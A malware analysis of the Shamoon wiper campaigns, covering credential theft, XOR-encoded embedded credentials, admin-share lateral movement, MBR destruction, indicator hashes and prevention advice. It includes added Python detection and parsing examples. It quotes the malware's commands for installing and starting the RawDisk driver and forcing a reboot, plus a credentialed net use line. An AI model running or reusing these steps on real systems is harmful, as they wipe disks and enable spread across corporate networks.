Shamoon

udurrani

INFO



If you are hit by Shamoon, it simply means:

1- You have been compromised for a long period, during which the attacker was able to stay on the corporate network and gather enough information about users, the network, subnet ranges, shares, end-points, servers, services etc.

2- You have been compromised multiple times without any knowledge of the attack. During each phase the attacker only gathered information, e.g. key-strokes, and eventually admin credentials.

3- Shamoon / the wiper requires admin credentials. The attacker could in theory obtain those with a zero-day privilege-escalation exploit, but that doesn't explain how the malware propagated and moved laterally so quickly within the network. Was it:

- Via USB??
- Via network share??
- Via zero day vulnerability running as a network service on all the machines??
- An insider’s job??

In any case, the attacker knew the credentials before the attack was launched. How did this work?

The attacker identified the target organization and ran reconnaissance to track important users, preferably ones with admin credentials. Once those users were identified, the attacker looked at their social media profiles to find out their job descriptions, then launched the initial attack with one of:

- Key-logger malware delivered as a binary to collect all key-strokes
- A macro / document carrying the key-logger payload to steal the credentials
- A zero-day exploit that launched persistent malware to collect admin credentials

Let's call this the PRE-SHAMOON phase. Without this stage the attacker could not have launched such a massive attack. Now that the adversary has all the information, i.e. domain names and admin credentials, the actual attack has to be put together. To do this the attacker has to statically embed the credentials in the binary / malware. The challenge is that plain strings are easily found by string analysis, e.g.

char *password = "Password@!2";
loginFunction(password);

If I compile this code and run the strings command on the binary, the credentials are visible in the output. To hide them the attacker used a very simple technique:



In all Shamoon 2 variants the value 0xed is used for the encoding, and it is applied to every character of the string. The byte values strings looks for are no longer in the file, so a plain strings pass finds nothing, while the malware decodes the credentials at run time.



This means each attack is specially crafted for a target organization, since the embedded credentials belong to that organization.

Inefficient? Yes, but it works perfectly.
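As an added example (not code from the page or from Shamoon itself), here is the hide-and-recover cycle in Python. The page only says that 0xED is applied to every character; the example assumes the operation is XOR. Because 0xED has its high bit set, every encoded ASCII byte ends up >= 0x80, which is exactly why strings stops seeing the credential. The sample credential is the one from the C snippet above, and the fake binary it is planted in is constructed here.

```python
"""Hiding and recovering a statically embedded credential with a single-byte key.

Added example, not Shamoon's code. The page states only that the value 0xED is
applied to every character of the string; this example assumes the operation is XOR.
"""
import re

KEY = 0xED                      # constant reported for all Shamoon 2 variants
CRED = "Password@!2"            # constructed sample, reused from the C snippet above
PRINTABLE = re.compile(rb"[\x20-\x7e]+")


def xor_bytes(data: bytes, key: int = KEY) -> bytes:
    """Apply the key to every byte. XOR is its own inverse, so encode == decode."""
    return bytes(b ^ key for b in data)


def encode(text: str, key: int = KEY) -> bytes:
    # Any ASCII byte (< 0x80) XOR 0xED (>= 0x80) has its high bit set: never printable.
    return xor_bytes(text.encode("ascii"), key)


def decode(blob: bytes, key: int = KEY) -> str:
    return xor_bytes(blob, key).decode("latin-1")


def strings(blob: bytes, min_len: int = 4) -> list[str]:
    """Minimal clone of the `strings` utility: runs of printable ASCII."""
    return [m.group().decode() for m in PRINTABLE.finditer(blob) if len(m.group()) >= min_len]


def build_fake_binary() -> bytes:
    """Constructed stand-in for a compiled dropper: a DOS header, a couple of
    plain strings and the credential stored in encoded form."""
    return (b"MZ\x90\x00" + bytes(8)
            + b"LoginToShare\x00" + encode(CRED) + b"\x00"
            + b"kernel32.dll\x00")


def find_hidden(blob: bytes, key: int = KEY, min_len: int = 6) -> list[str]:
    """What an analyst does once the key is known: XOR the whole image and run
    `strings` again; only text that was encoded with `key` becomes printable."""
    return strings(xor_bytes(blob, key), min_len)


def candidate_keys(blob: bytes) -> list[tuple[int, str]]:
    """Brute-force the single-byte key over a blob pulled from the data section:
    keep every key whose output is entirely printable. This narrows 256 keys
    to a handful; the analyst picks the one that reads as a credential."""
    hits = []
    for key in range(256):
        out = xor_bytes(blob, key)
        if PRINTABLE.fullmatch(out):
            hits.append((key, out.decode("ascii")))
    return hits


if __name__ == "__main__":
    image = build_fake_binary()
    print("strings on the binary :", strings(image))       # credential absent
    print("strings after XOR 0xED:", find_hidden(image))   # credential recovered
    print("keys giving printable text:", len(candidate_keys(encode(CRED))))
```

Run it and compare the two strings passes: the first shows only the decoy names, the second, after XOR with 0xED, shows the credential. candidate_keys is the fallback when the key is not known; it only narrows the field, since several keys map a short blob onto printable text.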

Intent

The intent of this malware is unknown, but it is definitely not to make money. The malware retrieves some data, then executes code that overwrites data and the Master Boot Record. The nature of the malware also indicates that it could be related to cyber-espionage campaign(s). It is aiming for complete destruction.

The MBR is the very first sector of the disk, i.e. 512 bytes. It is normally written there by the install process. This is the starting point of the disk: it holds the first boot code together with the partition table that describes how the disk is laid out. Some bootkits also modify the MBR code to stay in control, which makes them very hard to detect. Let's look at the MBR boot process:


A Linux MBR looks something like:



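To make the 512-byte layout concrete, here is an added Python example (not from the page) that parses an MBR, reports what the firmware will do with it, and compares a live sector against a saved copy, which is the check behind the back-up-your-MBR advice in the prevention list. The sample sector and the all-zero "wiped" sector are constructed; the page does not say what bytes Shamoon writes, only that the sector is overwritten.

```python
"""Parse and sanity-check a 512-byte Master Boot Record.

Added example, not from the page. Layout (standard PC MBR): bytes 0..445 boot
code, 446..509 four 16-byte partition entries, 510..511 signature 55 AA.
The sample sector below is constructed, not a real disk image.
"""
import struct
from dataclasses import dataclass

SECTOR = 512
PART_TABLE_OFF = 0x1BE      # 446
SIG_OFF = 0x1FE             # 510
BOOT_SIG = 0xAA55           # bytes 55 AA read as a little-endian word


@dataclass
class Partition:
    bootable: bool
    type_id: int
    lba_start: int
    sectors: int


def parse_mbr(sector: bytes) -> dict:
    """Return the signature check and the non-empty partition entries."""
    if len(sector) != SECTOR:
        raise ValueError("MBR must be exactly 512 bytes")
    sig = struct.unpack_from("<H", sector, SIG_OFF)[0]
    parts = []
    for i in range(4):
        # entry: status(1) CHS start(3) type(1) CHS end(3) LBA start(4) sector count(4)
        status, ptype, lba, count = struct.unpack_from("<B3xB3xII", sector, PART_TABLE_OFF + 16 * i)
        if ptype != 0:
            parts.append(Partition(status == 0x80, ptype, lba, count))
    return {"signature_ok": sig == BOOT_SIG, "partitions": parts}


def assess(sector: bytes) -> str:
    """What the firmware will make of this sector at boot."""
    m = parse_mbr(sector)
    if not m["signature_ok"]:
        return "unbootable: 0x55AA signature missing, firmware reports no operating system"
    if not m["partitions"]:
        return "unbootable: partition table empty"
    if not any(p.bootable for p in m["partitions"]):
        return "no active partition flagged"
    return "intact"


REGIONS = {"boot_code": (0, PART_TABLE_OFF),
           "partition_table": (PART_TABLE_OFF, SIG_OFF),
           "signature": (SIG_OFF, SECTOR)}


def diff_regions(backup: bytes, current: bytes) -> list[str]:
    """Compare a saved copy of the MBR with the live sector; names the regions that changed.
    Note: Windows keeps its 4-byte disk signature at 0x1B8, inside the boot-code region."""
    return [name for name, (lo, hi) in REGIONS.items() if backup[lo:hi] != current[lo:hi]]


def build_sample_mbr() -> bytes:
    """Constructed MBR: a few real boot instructions (cli; xor ax,ax; mov ss,ax)
    padded with NOPs, one active NTFS (0x07) partition starting at LBA 2048."""
    boot_code = b"\xfa\x33\xc0\x8e\xd0" + b"\x90" * (PART_TABLE_OFF - 5)
    entry = struct.pack("<B3sB3sII", 0x80, b"\x20\x21\x00", 0x07, b"\xfe\xff\xff", 2048, 1048576)
    return boot_code + entry + bytes(16 * 3) + b"\x55\xaa"


def build_wiped_mbr() -> bytes:
    """Constructed stand-in for an overwritten first sector (all zeros); the page does
    not say what bytes Shamoon writes, only that the MBR is overwritten."""
    return bytes(SECTOR)


if __name__ == "__main__":
    good, bad = build_sample_mbr(), build_wiped_mbr()
    print(parse_mbr(good))
    print(assess(good), "/", assess(bad))
    print("regions changed:", diff_regions(good, bad))
```

On a real host you would feed it the first 512 bytes read from \\.\PhysicalDrive0 (Windows) or /dev/sda (Linux); reading those needs administrator or root rights, which is also why the wiper needs them.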
As I mentioned before, the goal of Shamoon is to overwrite the MBR and then reboot. But let's take a look at what happens before the reboot.

Shamoon has the following components:

- Dropper
- Reporter
- Wiper
- Also it laterally jumps to other machines by using admin credentials

The dropper begins by dropping a binary and creating a service. Most of the binary names dropped over Shamoon's life are random, with different sizes, different hashes etc. Initially it uses the CreateFile and CreateProcess functions to launch the binary:



Normally a service is created with the Windows 'sc' command:



Worms are mostly a blend of malware code and exploit code: malware code to do the damage and exploit code to move laterally. The question is: how does it know whether a machine is already infected when it moves from one end-point to another? It can check for a mutex, look for a specific service it started, look at loaded DLLs, listening ports or just hidden files. That is how a worm hopping from one machine to another detects whether the machine is already infected; without such a check it would keep infecting the same machines again and again in an infinite loop. In Shamoon's case the payload is purely malware: there are no signs of exploit code. Shamoon checks for its service before launching the final stage.

Let's look at the service launched by Shamoon 1 in 2012



PING.exe was used to create a pause or delay instead of a simple Sleep() call, which would go through NtDelayExecution(). Shamoon 2 uses a different service name.

The wiper is dropped and launched using the following command:

C:\Windows\system32\randomName.exe 1



It also creates a couple of .pnf files that contain the time at which the wiper functionality is to start. Normally it is set to after work hours on a weekend:

CreateFileW ( "C:\Windows\inf\dcT21x400i.pnf" .....)

Reporting

In Shamoon 1 a hard-coded IP was used for reporting, i.e. every infected machine sent state information to an internal CnC. Think of this as a proxy pivot: every machine informs the internal CnC, which eventually tunnels the information to the external CnC. The format was pretty straightforward:



Where mydata = number of files deleted so far



In Shamoon 2 this proxy pivot did not matter; in some cases it was set to 1.1.1.1:80.

Lateral movement

Lateral movement is something you don't want on your corporate network, but for an attacker it is the ideal situation. In both cases it comes at a price: the attacker has to put more effort and knowledge behind the whole attack, while the defender has to prevent it before it is too late. Even if the defender is capturing all the traffic, it is still not easy to watch all the subnets and their internal communication. I made a tool for my home and work network where I can profile all the traffic between internal machines. It is a small agent that works on Windows, Linux and Mac and will notify on any connection initiation. It tells you which machines are communicating with each other. Normally internal machines, i.e. end-points, should not talk to each other.

In Shamoon's case lateral movement could be done using the following techniques:

- Exploitation
- Network shares
- Pass the hash
- Kerberos tokens
- An internal web server set up by the attacker
- Tools like PsExec or WinRM
- RDP

The attacker wants to achieve the following:

Delivery -> Payload (malware / Exploit) -> Persistence -> Stealth -> Lateral movement

For lateral movement Shamoon 2 used network shares, for which the attacker already knew the credentials. The attacker had statically embedded the credentials in the malware; they were not stored as plain char pointers or strings but encoded first and then embedded. The NetUseAdd() and NetUseDel() functions provide a way to connect to a network resource with explicit credentials, so the process can reach the share no matter which user it is running as:



Shamoon first checks whether the current user already has the rights to reach the share without supplying credentials. If not, it tries the statically embedded credentials. If this doesn't make sense, think of it as: your credentials have already been stolen and the attacker is just using them wherever required. Shamoon can use NetUseGetInfo() to find out whether a connection to the share already exists. One can do the same from the command line (the password goes before the /user: switch):

net use s: \\foo\fooFolder Password!@#$%^*& /user:udurrani
net use * /delete

Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include ADMIN$ and IPC$.

Adversaries may use this technique in conjunction with administrator-level Legitimate Credentials to remotely access a networked system over Server Message Block (SMB), interact with it using remote procedure calls (RPC), transfer files and run the transferred binaries through remote Execution. An example execution technique that relies on authenticated sessions over SMB/RPC is Scheduled Task.

This means Shamoon copies itself to a remote share and at the same time schedules a task to execute it there. All of this requires admin credentials. Remember, the credentials have already been stolen!

NetScheduleJobAdd() and NetScheduleJobDel() are used for task management.

To make sure everything is saved to C:\Windows\system32 even on a 64-bit system, Wow64DisableWow64FsRedirection() is called first; without it a 32-bit process writing to system32 is silently redirected to SysWOW64.

Shamoon 2 drops the file on a network share and creates a service to start it.
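The copy-to-ADMIN$ then schedule-or-service-launch sequence described above is a pattern a defender can look for in host logs. The following Python is an added example, not part of the page or of any product: it correlates, per host, an administrative-share access from a remote address with a scheduled task or new service whose command has the "<random>.exe 1" form seen throughout this write-up, and it flags any service install for the vdsk911 driver outright. The event records are constructed and the field names are my own; the event IDs (5140, 4698, 7045) are the standard Windows ones.

```python
"""Spot the copy-to-admin-share, then schedule/service-launch pattern in host logs.

Added example, not part of the page or of any product. Event IDs are the standard
Windows ones (5140 share accessed, 4698 scheduled task created, 7045 service installed);
the field names and the records themselves are constructed for this example.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)          # assumed: copy and launch happen close together
ADMIN_SHARES = {"ADMIN$", "C$"}
# "<random>.exe 1" under system32 is the launch form seen throughout the page
LAUNCH_RE = re.compile(r"\\system32\\[a-z0-9_]+\.exe 1$", re.IGNORECASE)
RAWDISK_SERVICE = "vdsk911"             # driver service name from the page

EVENTS = [  # constructed sample telemetry, not real logs
    {"t": "2017-01-23T21:58:03", "host": "WS-017", "id": 5140, "src": "10.0.5.12", "share": r"\\*\ADMIN$"},
    {"t": "2017-01-23T21:58:05", "host": "WS-017", "id": 4698, "task": "At1",   # AT-style job name, assumed
     "cmd": r"C:\Windows\system32\sbuvideo.exe 1"},
    {"t": "2017-01-23T21:58:06", "host": "WS-017", "id": 7045, "service": "NtertSrv",
     "image": r"C:\Windows\system32\newtvsc.exe 1"},
    {"t": "2017-01-23T22:31:00", "host": "WS-017", "id": 7045, "service": "vdsk911",
     "image": r"System32\Drivers\vdsk911.sys"},
    {"t": "2017-01-23T21:59:10", "host": "WS-042", "id": 5140, "src": "10.0.5.30", "share": r"\\*\IPC$"},
    {"t": "2017-01-23T22:04:00", "host": "WS-042", "id": 7045, "service": "BackupAgent",
     "image": r"C:\Program Files\Backup Agent\agent.exe"},
]


def _ts(e: dict) -> datetime:
    return datetime.fromisoformat(e["t"])


def _launch_cmd(e: dict) -> str:
    """4698 carries the task command, 7045 the service image path."""
    return e.get("cmd") or e.get("image", "")


def detect(events: list[dict]) -> list[dict]:
    by_host = defaultdict(list)
    for e in events:
        by_host[e["host"]].append(e)
    alerts = []
    for host, evs in by_host.items():
        evs.sort(key=_ts)
        for e in evs:
            # Rule 1: the RawDisk driver service appearing at all is a high-confidence hit.
            if e["id"] == 7045 and (e.get("service", "").lower() == RAWDISK_SERVICE
                                    or e.get("image", "").lower().endswith(RAWDISK_SERVICE + ".sys")):
                alerts.append({"host": host, "rule": "rawdisk_driver", "when": e["t"],
                               "detail": e.get("image", "")})
            # Rule 2: remote admin-share access followed shortly by a task/service launch
            # of a system32\<name>.exe with the single argument "1".
            if e["id"] == 5140 and e["share"].rsplit("\\", 1)[-1].upper() in ADMIN_SHARES:
                t0 = _ts(e)
                for f in evs:
                    if f["id"] not in (4698, 7045):
                        continue
                    if not (timedelta(0) <= _ts(f) - t0 <= WINDOW):
                        continue
                    cmd = _launch_cmd(f)
                    if LAUNCH_RE.search(cmd):
                        alerts.append({"host": host, "rule": "admin_share_then_launch",
                                       "when": f["t"], "src": e["src"], "detail": cmd})
    return alerts


if __name__ == "__main__":
    for a in detect(EVENTS):
        print(a)
```

The time window and the "one numeric argument" heuristic are the tunable parts; the vdsk911 rule needs no tuning, since a legitimate host has no reason to register a kernel service by that name.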

Kill Time

After the launch, Shamoon waits for the kill time. This is the time at which Shamoon drops the driver and starts wiping files and the MBR. Once the system time >= kill time, the driver is dropped and the service is started:



The service runs the following commands:

C:\Windows\system32\cmd.exe /c sc stop vdsk911 2>&1 >nul
\cmd.exe /c sc delete vdsk911 2>&1 >nul
sc delete vdsk911

At this stage the system time is changed, i.e. reset to 2012. The wiper functionality relies on the EldoS RawDisk driver, and the attacker is using an evaluation license key for which the time MUST NOT exceed 8/2012 (the license expiry date). To make sure everything works with the original EldoS trial key, the attacker resets the clock:



C:\Windows\system32\cmd.exe /c sc create vdsk911 type= kernel start= demand binpath= System32\Drivers\vdsk911.sys 2>&1 >nul
sc create vdsk911 type= kernel start= demand binpath= System32\Drivers\vdsk911.sys
C:\Windows\system32\cmd.exe /c sc start vdsk911 2>&1 >nul
sc start vdsk911
C:\Windows\system32\cmd.exe /c shutdown -r -f -t 2



After the reboot the machine cannot boot: the overwritten MBR is no longer valid, so the firmware reports that no operating system was found.



New Shamoon 2 Campaign 2017

Shamoon 2 had another successful campaign in 2017. During this campaign nothing much changed other than one important component. The driver used in all the attacks since 2012 had never changed; in this campaign the attacker changed the driver (new hash and size).





Other than that, things are pretty similar to the previous Shamoon 2 attack. Let's recap the new scenario very quickly:

OpenServiceW (HANDLE, "NtertSrv" ...);

C:\Windows\system32\newtvsc.exe 1

cmd.exe /c sc stop vdsk911 2>&1 >nul

cmd.exe /c sc create vdsk911 type= kernel start= demand binpath= System32\Drivers\vdsk911.sys 2>&1 >nul

C:\Windows\system32\sbuvideo.exe 1 (RandomName binary)

The new variant uses an internal CnC. The HTTP request is built with WinHTTP, with the internal host configured as a named proxy, and Winsock helpers are used for the address handling:

WinHttpOpen ( "Mozilla/13.0 (MSIE 7.0; Windows NT 6.0)", WINHTTP_ACCESS_TYPE_NAMED_PROXY, "192.168.1.1:80", ...);

Later, for the HTTP connection:

WinHttpConnect(...)



SPLITTING THE OCTETS AND APPLYING NETWORK BYTE ORDER

inet_ntoa ( { S_un = { S_un_b = { s_b1 = 172, s_b2 = 16, s_b3 = 177 ...}, S_un_w = { s_w1 = 4268, s_w2 = 177 }, S_addr = 11604140 } } )

The three views are the same four bytes: S_addr = 11604140 = 0x00B110AC, stored little-endian on x86 as AC 10 B1 00, i.e. the octets in network (memory) order. The first two octets 172 and 16 read together as the word 0x10AC = 4268, which is s_w1.

SEQUENCE FOR NEW SHAMOON (2017)



C:\Windows\system32\cmd.exe /c sc stop vdsk911 2>&1 >nul

C:\Windows\system32\cmd.exe /c sc delete vdsk911 2>&1 >nul

sc delete vdsk911

sc create vdsk911 type= kernel start= demand binpath= System32\Drivers\vdsk911.sys

C:\Windows\system32\cmd.exe /c sc start vdsk911 2>&1 >nul

sc start vdsk911

sc delete vdsk911

C:\Windows\system32\caiaw00b.exe 1 (Binary name is random)

C:\Windows\system32\cmd.exe /c sc stop vdsk911 2>&1 >nul

C:\Windows\system32\cniaw001.exe 1

CreateFileW ( "C:\Windows\inf\tyb6_s32.pnf" .....);

CreateFileW ( "C:\Windows\inf\tyb6_s32.pnf" .....);

GetDiskFreeSpaceW ( "C:\" ....);

CreateFileW ( "\\?\ElRawDisk\# ......" ....);

If the current time != KILL-TIME it delays via NtDelayExecution:

Sleep ( 120000 ) // 120000 ms = 2 minutes

FINAL SHUTDOWN COMMAND USING CreateProcess()

CreateProcessA ( "C:\Windows\system32\cmd.exe", "C:\Windows\system32\cmd.exe /c shutdown -r -f -t 2" ...);


NOTE


Please note that there were some other incidents on the same day that were not directly related to the Shamoon campaign. Some of them used the NetWire RAT and some used ransomware. The ransomware was able to move laterally using PsExec and destroyed multiple servers. The sample used RC4 encryption with the key statically embedded in the payload.



PsExec is saved under a random name, e.g. control.exe or move.exe


Finally everything is converted to the .zXz extension and the final page carries all the ransom information, i.e. zXz.html (no financial motive)
*eax = *"\zXz.html";


NetWire RAT (.NET binaries)


DNS


TCP


PLEASE NOTE THAT THE ABOVE TWO INCIDENTS WERE NOT SHAMOON VARIANTS; HOWEVER, THE RANSOMWARE'S MOTIVE (DESTRUCTION, NOT PAYMENT) WAS SIMILAR



Prevention

They say prevention is better than cure. It is best if the attack is prevented in the PRE-SHAMOON phase. Once the credentials are leaked, it becomes very difficult to prevent such attacks. In the next phase of Shamoon attacks the attacker may target the security products running in the corporate network, e.g. tamper with end-point or network security. If you lose all the keys to your network, by the time you realize what hit you it is already too late.

Most targeted attacks are not easy to detect and no security product is 100%. It is good to have multiple layers of security in place, and one can always develop simple in-house tools to automate such detections.

Over Shamoon's life cycle the size, name and hash of the dropped binaries keep changing.

Some of the hashes, old and new:

47BB36CD2832A18B5AE951CF5A7D44FBA6D8F5DCA0A372392D40F51D1FE1AC34
113525C6BEA55FA2A2C6CF406184092D743F9D099535923A12CDD9B9192009C4
7D71DAB090E367847B9AB839A6242AF6BD6362A3A84A501ABBEBC2F2C0EF4B05
394a7ebad5dfc13d6c75945a61063470dc3b68f7a207613b79ef000e1990909b
772ceedbc2cacf7b16ae967de310350e42aa47e5cef19f4423220d41501d86a5
61C1C8FC8B268127751AC565ED4ABD6BDAB8D2D0F2FF6074291B2D54B0228842
c7fc1f9c2bed748b50a599ee2fa609eb7c9ddaeb9cd16633ba0d10cf66891d8a
128fa5815c6fee68463b18051c1a1ccdf28c599ce321691686b1efa4838a2acd
EFD2F4C3FE4E9F2C9AC680A9C670CCA378CEF6B8776F2362ED278317BFB1FCA8
5a826b4fa10891cf63aae832fc645ce680a483b915c608ca26cedbb173b1b80a (Driver: 2012 and 2016)
AA6C7C2AD6D0D961196EDABA7B5BB7A930D9CB850AA69ABEE02C9C0479F97E86 (Driver: 2017)
F9D94C5DE86AA170384F1E2E71D95EC373536899CB7985633D3ECFDB67AF0F72
4744df6ac02ff0a3f9ad0bf47b15854bbebb73c936dd02f7c79293a2828406f6
4F02A9FCD2DEB3936EDE8FF009BD08662BDB1F365C0F4A78B3757A98C2F40400
DBDEA08E7B970D395236B8E0AADA6FC07FB23E6181485D86F65DA1E73AB2BA2E
EE3F56DF45F2D60E73894B063A2CCC15E940D8D53497788B6EC8C416312AD7C0
69880af5d0daa1fb4ddd704e5ee77cb16f7c7521e3826554e62b2e4fba6a8e87

The hash labelled as the driver (5a826b4f...) is the actual driver file, and it remained the same in all Shamoon attacks from 2012 through 2016. The 2017 campaign switched to a new driver (AA6C7C2A...), so keep both on your list. The old driver's hash and size (31632 bytes) are still a good indicator, so look through your drivers folder for them.

- Make sure you look for the driver file. Search by file size and hash
- A string check is not a bad idea as well, e.g. the service description the driver carries:
     Distributed Link Tracking Server
     Enables the Distributed Link Tracking Client service within the same domain to provide more reliable and efficient maintenance of links within the domain. If this service is disabled, any services that explicitly depend on it will fail to start

- Products with big-data analytics and an AI component are good at detecting such things
- Signature check via AV
- Disable applications running directly from USB
- Disable applications running directly from network folders
- Network segregation
- Two-factor authentication for access to privileged domain accounts is not a bad idea
- Some companies use jump servers to access important control machines
- Profile your internal machines, i.e. end-points and servers. I developed a tool to profile end-points and servers on my network; you can take a look


- Introduce good exploit protection on your end-points
- Make sure you watch all the alerts / events. In Shamoon's case there was an incident before the actual Shamoon happened, meaning someone had already stolen your credentials. So pay attention to things like key-loggers and brute-force attacks
- Domain admins should have a limited number of accounts and should change passwords frequently
- Back up your MBR and keep the copy off the host, so the first sector can be restored (the MBR itself cannot be encrypted, since the firmware has to read it in the clear)
- Last but not least, hire people who understand security. It's easy to buy all the fancy products (if you have the money :-) ) but at the end of the day you need your team to take advantage of those products
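Putting the hash, size and string checks from the list above into one script: this is an added example, not the author's forensic tool and not code from the page. The two driver hashes and the 31632-byte size are taken from the page; the folder it scans in the demo is constructed on the fly, so only the size and string rules can fire there (a file carrying the real driver's hash is not something to ship in an example). The string is searched both as ASCII and as UTF-16LE, since PE version information is stored as UTF-16.

```python
"""Hunt for the Shamoon RawDisk driver by hash, size and embedded string.

Added example, not the author's tool. The two driver hashes and the 31632-byte
size come from the page; the sample directory below is constructed, so the
hash rule cannot fire on it and only the size and string rules are exercised.
"""
import hashlib
import os
import tempfile
from pathlib import Path

DRIVER_HASHES = {
    "5a826b4fa10891cf63aae832fc645ce680a483b915c608ca26cedbb173b1b80a": "driver, campaigns 2012-2016",
    "aa6c7c2ad6d0d961196edaba7b5bb7a930d9cb850aa69abee02c9c0479f97e86": "driver, campaign 2017",
}
DRIVER_SIZE = 31632                                   # size of the 2012-2016 driver (from the page)
MARKER = "Distributed Link Tracking Server"           # service display name the driver carries
MARKER_BYTES = (MARKER.encode("ascii"), MARKER.encode("utf-16-le"))   # PE version info is UTF-16


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def check_file(path: Path) -> list[str]:
    """Return the indicator names that match this file (empty list = clean)."""
    reasons = []
    if sha256_file(path) in DRIVER_HASHES:
        reasons.append("hash")
    if path.stat().st_size == DRIVER_SIZE:
        reasons.append("size")
    data = path.read_bytes()
    if any(m in data for m in MARKER_BYTES):
        reasons.append("string")
    return reasons


def scan(root: Path, suffixes=(".sys",)) -> list[tuple[str, list[str]]]:
    """Walk a drivers folder (e.g. C:\\Windows\\System32\\drivers) and report matches.
    Size alone is weak evidence; a hash hit, or size together with the string, is strong."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            if p.suffix.lower() in suffixes:
                reasons = check_file(p)
                if reasons:
                    hits.append((str(p), reasons))
    return hits


def build_sample_tree() -> Path:
    """Constructed test folder: one benign driver and one file that has the
    page's size and string indicators (its hash is not the real driver's)."""
    root = Path(tempfile.mkdtemp(prefix="drivers_"))
    (root / "benign.sys").write_bytes(b"MZ" + bytes(4094))
    body = b"MZ" + MARKER.encode("utf-16-le")
    (root / "vdsk911.sys").write_bytes(body + bytes(DRIVER_SIZE - len(body)))
    (root / "notes.txt").write_bytes(MARKER.encode("ascii"))   # not a .sys, skipped by scan()
    return root


if __name__ == "__main__":
    for path, reasons in scan(build_sample_tree()):
        print(path, "->", ", ".join(reasons))
```

Point scan() at the real drivers folder (run elevated so every file is readable) and treat a "hash" hit, or "size" plus "string" together, as a reason to pull the host off the network and image it before the kill time arrives.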


Tool to identify the Shamoon driver and some forensics (PASSWD: foo), please CLICK HERE. RUN AS ADMIN.
This tool is not 100%. It tries to identify Shamoon and also provides forensics. Look for shm.html and make sure there are no orange or red rows. There are also multiple files that give you more forensic data. d_warn.txt looks for specific signatures; if it is empty, no signatures were found.

Conclusion

I won't get into the actual motive or politics of the attack, but thousands of machines (end-points and servers) were destroyed during this campaign. It also became clear that targeted campaigns are often successful. Targeted attacks are developed over months if not years and are heavily tested against security products. Some say Shamoon was poorly written with inefficient code. I don't think it matters in such cases; the only thing that matters is the actual outcome. To end on a positive note, such attacks can be stopped with the right mix of technology and skills.


Shamoon Summary